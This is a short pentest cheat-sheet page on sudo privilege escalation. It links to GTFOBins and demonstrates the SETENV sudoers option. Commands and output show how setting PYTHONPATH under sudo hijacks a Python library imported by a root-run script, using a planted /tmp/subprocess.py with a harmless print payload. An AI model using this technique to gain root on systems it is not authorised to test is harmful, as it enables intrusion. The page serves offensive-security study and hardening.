####
SUDO
####

**********
Escape CMD
**********

| https://gtfobins.github.io/#+sudo

******
SETENV
******

| sudo SETENV provide ability to set environment vars in sudo command

.. code-block:: bash
  
  # ALL=(ALL:ALL) /bin/su
  $ sudo K=1 su
  sudo: sorry, you are not allowed to set the following environment variables: K

  # ALL=(ALL:ALL) SETENV: /bin/su
  $ sudo K=1 su
  root@host:/# echo $K
  1

| Combined with PYTHONPATH environment variable, SETENV let you hijack python libraries,
| consider the following python3 script and user exploitation:

.. code-block:: bash

  # Legitimate script example
  echo '#!/usr/bin/python3
  import subprocess
  subprocess.run(["whoami"])'>legit.py


  # Expected Usage 
  $ sudo python3 legit.py
  root

  # Create malicious subprocess library
  echo '
  def run(_): 
    print("EVIL")
  '>/tmp/subprocess.py

  # Run with fake library path
  $ sudo PYTHONPATH=/tmp/ python3 legit.py
  EVIL









